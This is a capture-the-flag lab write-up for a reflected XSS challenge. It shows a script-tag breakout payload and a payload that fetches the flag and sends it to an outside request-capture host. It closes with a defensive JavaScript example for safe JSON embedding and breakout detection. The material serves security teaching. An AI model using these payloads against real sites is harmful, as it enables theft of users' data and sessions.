Simple Web 0x11(Lab - XSS Me)

tags: NTUSTWS CTF Web

Challenge: http://h4ck3r.quest:8800/

Background

:::spoiler The attacker does not attack the victim directly. Instead, a malicious script is planted in a web page the victim will visit; when the victim loads that page, the script runs automatically and sends some of the victim host's data back to the attacker (this is one way of being victimized; cookies may also simply be stolen outright).

:::

Source code

```html
...
<script>
    const message = {"icon": "error", "titleText": "User not found.", "timer": 3000, "showConfirmButton": false, "timerProgressBar": true};
    window.onload = function () {
        if (message !== null) Swal.fire(message);
    }
</script>
...
```

Exploit

  1. Check XSS: the `message` query parameter is reflected, unescaped, into the `titleText` field of the JSON literal inside the inline `<script>`.
     ```html
     ...
     <script>
         const message = {"icon": "error", "titleText": "youshallnotpass", "timer": 3000, "showConfirmButton": false, "timerProgressBar": true};
         window.onload = function () {
             if (message !== null) Swal.fire(message);
         }
     </script>
     ...
     ```

  2. Try to inject a script tag. Payload: http://h4ck3r.quest:8800/?type=error&message=%3C/script%3E%3Cscript%3Ealert(123)%3C/script%3E//
     The HTML parser ends a `<script>` element at the first `</script>` it sees, regardless of JavaScript string quoting, so the injected `</script>` closes the original block and the `<script>alert(123)</script>` that follows is executed as a new script element.
     ```html
     ...
     <script>
         const message = {"icon": "error", "titleText": "</script><script>alert(123)</script>//", "timer": 3000, "showConfirmButton": false, "timerProgressBar": true};
         window.onload = function () {
             if (message !== null) Swal.fire(message);
         }
     </script>
     ```

     • Hint: if you log in as guest (password = guest), you can see the response.

  3. Fetch the flag and send it to beeceptor. Payload:
     http://h4ck3r.quest:8800/?message=%3C/script%3E%3Cscript%3Efetch(`/getflag\).then(r=%3Er.text()).then(flag=%3Elocation.href=`https://sbk6401.free.beeceptor.com/?f=${flag}`)%3C/script%3E//

  4. Report the URL to the admin. Then you get the flag!
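The breakout above works because the output of `JSON.stringify` is dropped straight into a `<script>` element, and the HTML tokenizer does not care about JavaScript string quoting. The following JavaScript is an added example, not part of the original writeup or of the challenge's own code: it shows the naive rendering beside a hardened serializer that escapes the HTML-significant characters as `\uXXXX`, plus a small check that flags a premature `</script` in rendered output. The function names (`renderUnsafe`, `jsonForScript`, `renderSafe`, `scriptBreakout`, `roundTrips`) and the `hostile` sample object are assumptions constructed for this example; the sample mirrors the `alert(123)` payload shape from step 2.

```javascript
// Added example (not the writeup's or the challenge's code): safely embedding a
// server-controlled object into an inline <script>, which is the fix for the
// "</script> breaks out of the JSON string" pattern shown in the exploit steps.
//
// The HTML parser ends a <script> element at the first "</script" it sees,
// regardless of JavaScript string quoting, so JSON.stringify() on its own is
// not enough. Escaping "<", ">" and "&" as \uXXXX keeps the output valid JSON
// and valid JavaScript while removing every byte sequence the HTML parser
// could act on.

// Naive rendering, as in the vulnerable page: attacker-controlled fields are
// placed into the script block with plain JSON.stringify().
function renderUnsafe(message) {
  return `<script>\n    const message = ${JSON.stringify(message)};\n</script>`;
}

// Hardened serializer (assumed name): JSON.stringify, then replace the
// characters that matter to the HTML parser, plus the two JS line terminators
// that JSON.stringify leaves unescaped.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderSafe(message) {
  return `<script>\n    const message = ${jsonForScript(message)};\n</script>`;
}

// Detection helper: does the rendered HTML contain a premature "</script"
// between the opening tag and the intended closing tag? The real HTML
// tokenizer matches the end tag case-insensitively, hence the /i flag.
function scriptBreakout(html) {
  const body = html.slice(html.indexOf('>') + 1, html.lastIndexOf('</script>'));
  return /<\/script/i.test(body);
}

// Round-trip check: the escaped JSON still parses back to the same value,
// so the fix does not change what the page's own JavaScript receives.
function roundTrips(value) {
  return JSON.stringify(JSON.parse(jsonForScript(value))) === JSON.stringify(value);
}

// Constructed sample, mirroring the payload shape from the writeup.
const hostile = {
  icon: 'error',
  titleText: '</script><script>alert(123)</script>//',
  timer: 3000,
};

console.log(scriptBreakout(renderUnsafe(hostile))); // true: breakout present
console.log(scriptBreakout(renderSafe(hostile)));   // false: no "</script" left
console.log(roundTrips(hostile));                   // true: value unchanged
```

Run it with `node`. The point of `roundTrips` is that the escaping is purely a transport concern: `Swal.fire` would still receive exactly the same object, so there is no functional reason for a template layer to skip it. A Content-Security-Policy that disallows inline scripts is a useful second layer, but it does not replace output encoding at the point where data meets markup.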